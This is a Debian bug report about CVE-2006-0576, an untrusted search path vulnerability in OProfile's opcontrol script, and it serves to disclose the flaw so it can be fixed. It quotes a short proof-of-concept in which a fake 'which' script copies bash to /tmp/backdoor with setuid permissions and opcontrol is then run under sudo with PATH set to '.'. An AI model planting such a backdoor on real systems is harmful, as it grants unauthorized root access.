Package: oprofile
Severity: normal
CVE-2006-0576 reads:
Untrusted search path vulnerability in opcontrol in OProfile 0.9.1 and
earlier allows local users to execute arbitrary commands via a modified
PATH that references malicious (1) which or (2) dirname programs.
NOTE: while opcontrol normally is not run setuid, a common configuration
suggests accessing opcontrol using sudo. In such a context, this is a
vulnerability.
Giving sudo to oprofile is apparantly a very common practice.
>From the original report:
Whoever coded the script tried protecting it against executing binaries
out of a safe PATH by defining one on line 1416:
PATH=/usr/local/bin:/usr/local/sbin:/bin:/sbin:/usr/bin:/usr/sbin
The problem is that this script does not check where the 'which' or
'dirname' binary is executed from on line 1413/1414.
This enables a malicious user to execute arbitrary code by using the
following pseudo'exploit':
cat > which
#!/bin/sh
/bin/cp /bin/bash /tmp/backdoor
/bin/chmod 6755 /tmp/backdoor
^C
set PATH="."
/usr/bin/sudo /usr/local/bin/opcontrol
This is a relatively low severity vulnerability, but easily fixed.
-- System Information:
Debian Release: testing/unstable
APT prefers unstable
APT policy: (500, 'unstable'), (500, 'testing'), (500, 'stable')
Architecture: i386 (i686)
Shell: /bin/sh linked to /bin/bash
Kernel: Linux 2.6.15-1-686-smp
Locale: LANG=en_US, LC_CTYPE=en_US (charmap=ISO-8859-1)
--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
